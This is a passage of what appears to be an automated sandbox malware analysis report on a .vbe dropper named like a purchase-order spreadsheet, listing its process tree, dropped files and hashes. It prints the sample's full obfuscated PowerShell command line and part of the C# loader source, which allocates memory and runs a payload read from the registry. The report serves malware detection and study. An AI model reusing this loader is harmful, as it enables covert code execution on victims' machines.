Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 755441 | Sample: PO-08784 xlsx.vbe | Startdate: 28/11/2022 | Architecture: WINDOWS | Score: 72
Signatures attached to the start node: Malicious sample detected (through community Yara rule); Sigma detected: Dot net compiler compiles file from suspicious location; Machine Learning detection for dropped file
Process tree as drawn in the graph (numbers after a process name are the badge counts shown on that node):
  wscript.exe 1 1 (started)
    signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
    powershell.exe 21 (started)
      dropped: C:\Users\user\AppData\...\bqup1euq.cmdline, Unicode
      csc.exe 3 (started)
        dropped: C:\Users\user\AppData\Local\...\bqup1euq.dll, PE32
        cvtres.exe 1 (started)
      conhost.exe (started)
    cmd.exe 1 (started)
      conhost.exe (started)

Initial sample:
Source | Detection | Scanner
PO-08784 xlsx.vbe | 2% | Virustotal

Dropped files:
Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll | 100% | Joe Sandbox ML

No Antivirus matches
No Antivirus matches

URLs:
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.526784989.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.536819420.0000000005484000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            No contacted IP infos
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:755441
Start date and time:2022-11-28 17:57:24 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 58s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:PO-08784 xlsx.vbe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.expl.winVBE@11/9@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 28
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5064 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
17:59:26 | API Interceptor | 28x Sleep call for process: powershell.exe modified

No context
No context
No context
No context
No context
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):8003
Entropy (8bit):4.839308921501875
Encrypted:false
SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
MD5:937C6E940577634844311E349BD4614D
SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
Malicious:false
Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 01:59:36 2022, 1st section name ".debug$S"
Category:dropped
Size (bytes):1332
Entropy (8bit):3.9957433595008767
Encrypted:false
SSDEEP:24:HTzW9gaaIM5aHNhKPfII+ycuZhNaakSiPNnq92d:+aIMU7KPg1ulaa3uq9G
MD5:1C80558DCC94D3FD4F7B17286D92DF42
SHA1:F3681A06D954ACB58F4220D7B5254D932DCC76FB
SHA-256:D72A354494ECF6C41CD3CCD149DBED680A12218A5F47DCAE1268F82FF0F0CBF1
SHA-512:9BE0ED7915442AA737A5FEE290DA5A6C4B4FE194EAF53BFE6227642DEC95B30A9BA112B60BDC7D95419FF4DF362BCAD2D5D0036B9B3B979CEF128758798E3240
Malicious:false
Preview:L....g.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP........................T........p..........7.......C:\Users\user\AppData\Local\Temp\RES47C6.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.q.u.p.1.e.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.107923304203291
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqiPN5Dlq5J:+RI+ycuZhNaakSiPNnqX
MD5:998B7FA2FFBE54BE98BEC5121AE6FE70
SHA1:46F990AC5C9ADC468B57D96D57B88373DB496337
SHA-256:AF3E64F5A6A5B28C61E346B2572EFEC45CCE288AA9AEF0F165DFB6074369A032
SHA-512:2766D2A4C803489FB7D2E9034D551CD873E33507D1A2BADB241933261BE8F556AAE9223391653B3894FE1DD0C8E315D8636A5DFA3632E7FB8FBC31C9EED4BA57
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.q.u.p.1.e.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.q.u.p.1.e.u.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1075), with no line terminators
Category:dropped
Size (bytes):1078
Entropy (8bit):4.940853242499253
Encrypted:false
SSDEEP:24:JVSRTQ1BI7kKMy6k1Ahr0n8rsvJmsIpLnH:JV6TIBAXyuM08rsvJmsCLnH
MD5:D697E139982C89FE5B0FD2410BE24D8A
SHA1:A4436350800275EAB95B8C9FFF79C1A5AA3D5783
SHA-256:7665F657D3972656C1ACBD5C46C4E1886F2CB8B427C0996BC78A34DCCF00C459
SHA-512:8E1E55545B9B893D28FDF82C9A5122F35531CB3AB35A5C9CBA05FC52227BCD4F69513C07EE8EA2DEB02BC9F059116103228A9F7A480BEADA2FD153F937E3A726
Malicious:false
Preview:.using System;using System.Runtime.InteropServices;public static class Methyl1 {[DllImport("kernel32")]public static extern int GetThreadTimes(int Progr82,int Fremad,int Tele,int Tredi,int Tim);[DllImport("user32")]public static extern int ClientToScreen(int Inkorp,int tekno);[DllImport("kernel32")]public static extern int ExpandEnvironmentStrings(int Rotte,int Bul,int Ento);[DllImport("user32")]public static extern int EnumChildWindows(int Lithed,int Diobo,int Alung);[DllImport("winmm.dll")]public static extern int joySetCapture(int Kodif,int Vej,int Empti,int Reacti);[DllImport("kernel32")]public static extern void GlobalMemoryStatus(int Anlgsi);[DllImport("kernel32")]public static extern int IsValidCodePage(int Gaum);[DllImport("kernel32")]public static extern int HeapReAlloc(int Hand,int Fals,int Hung,int Under);[DllImport("gdi32")]public static extern int CreateSolidBrush(int For);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImpor

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
Category:dropped
Size (bytes):375
Entropy (8bit):5.216906384863357
Encrypted:false
SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fVYAYVzxs7+AEszIN723fVYAYQ:p37Lvkmb6K2agWZETad
MD5:8D659EF1EB3A75D7370EB00129EEC3A8
SHA1:EA3BD80A8CC1B6495A97CDA8F0A4E8FA0C9DD08E
SHA-256:6D94C527B8C7BAD892E5DE2870056C9F5AE44ECCA51A1AF82EA02EB2DBD2FA20
SHA-512:8B282C6BBBC0E20694DA40C14041927E5F20D8BE4133AE5D52AAC72D1802CA378C52A8EEE57D4D9E168BE580E5C8BB1D1BEE335DA84944927EBB530B368CD261
Malicious:true
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.0.cs"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):3.0590590133788105
Encrypted:false
SSDEEP:24:etGS4oL4q2fP+8cX7uAwOCTO7Ax+ilZeXaIXedLo1TtkF2A4NmWI+ycuZhNaakS7:67pwPNYcYLIeT+1F2A61ulaa3uq
MD5:DF046D645321C882E947BA0D536D11B6
SHA1:79D0A1689D20FF3139DCFEC21F8808E8F7C7B128
SHA-256:77576BF5143A3AB3D2C287994FE49A0D5D0E64E7D6D06DF5870E00023E418725
SHA-512:80AE7EA993BB2B846806AE3638D9CC71F5A98D3C42F11FF02DB96EFBDFA81F0EB3632AB1D67193F684554E7B01D1767DCE2AE3D1A102CEF85D8C274EA6F870E0
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g.c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.0.......#GUID...@...p...#Blob...........G.........%3............................................................/.(...................................................... 6............ E............ T............ m............ ~. .......... ..(.......... ..-.......... .. .......... ..-.......... .. .......... ..2...................

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
Category:modified
Size (bytes):870
Entropy (8bit):5.327046431108276
Encrypted:false
SSDEEP:24:Aqd3ka6K2ahETaYKaM5DqBVKVrdFAMBJTH:Aika6ChE+YKxDcVKdBJj
MD5:DC0E7F90DE528663E8E504CF226E871C
SHA1:34FC3D9AD0A1BE5FCDF3EFB42934B80C54946C00
SHA-256:52F005C1E64201E649E456E32C44F11F2B27868A81027F3D1D735916FB3D5F94
SHA-512:3885E2F8AA50C223B8BAFFED646C52A57251CD1D4EA5553AB34F26E7AE50A813F2F98C5B0A506E09A38B9CF5F33773DB378E2896732399FD7949F3B560ABFB05
Malicious:false
Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
File type:ASCII text, with CRLF line terminators
Entropy (8bit):5.855492842209971
TrID:
File name:PO-08784 xlsx.vbe
File size:352659
MD5:266115592f966240c14dfeeec624bdf5
SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
SHA512:951e630a3faca243913ef3955fda178356ab1fbab1dc236c9ef6db096fc1c48b517bcce5b9964f72de213787aca6f9acdeb71fe669119f435088e2c9dcb47e7e
SSDEEP:6144:JRYNxYchRj8pwdtWU4QfN+jWR4MvMsLYstdy2BxV72Q8qE+dRLzHb4HZIKK:jwhRjNtWU4vWRDvtEIy0xV7tNnRW6KK
TLSH:D874AEB1993126244D0F130BAB861AC48CE937E71513232D5DABF78D2633F4F926E6D9
File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
Icon Hash:e8d69ece869a9ec4
No network behavior found


Target ID:0
Start time:17:58:24
Start date:28/11/2022
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
Imagebase:0x7ff7e7630000
File size:163840 bytes
MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:1
Start time:17:58:26
Start date:28/11/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:CMD.EXE /c echo C:\Windows
Imagebase:0x7ff7cb270000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:2
Start time:17:58:26
Start date:28/11/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6da640000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:3
Start time:17:58:31
Start date:28/11/2022
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
              Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl 
BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe 
Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;;
              Imagebase:0x160000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:4
              Start time:17:58:31
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6da640000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:12
              Start time:17:59:35
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
              Imagebase:0x300000
              File size:2170976 bytes
              MD5 hash:350C52F71BDED7B99668585C15D70EEA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:moderate

              Target ID:13
              Start time:17:59:35
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Wow64 process (32bit):true
